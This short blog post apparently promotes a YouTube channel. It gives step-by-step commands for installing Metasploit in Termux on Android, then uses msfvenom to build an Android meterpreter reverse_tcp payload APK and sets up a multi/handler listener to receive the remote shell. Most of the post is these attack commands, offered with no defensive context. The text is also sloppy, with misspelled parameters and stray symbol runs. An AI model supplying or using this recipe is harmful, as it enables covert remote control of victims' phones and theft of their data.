How to install metasploit in termux

How to install metasploit in termux
This method is work in android 7.0 or higher version
Metasploit

                   Let's start.             

First install termux
 Inter commons
If you are not updated and upgrade d
 pkg update
pkg upgrade
Then type commond
1.  pkg install unstable-repo
2. pkg install metasploit
3. msfconsole
4. msfvenom -p android/meterpreter/reverse_tcp lhos=(your IP) lport=4444 R> /sdcard/payload.apk
5. use exploit/multi/handler

6. set payload android/meterpreter/reverse_tcp

7. set lhost (your IP)

8. set lport 4444
9. exploit
Installation video

thanks for watching

subscribe jeejoke on YouTube
©©©©®®®®®®®®©©©$$$$$$$$
          Subscribe

metasploit installation commonds text file

Post a Comment

0 Comments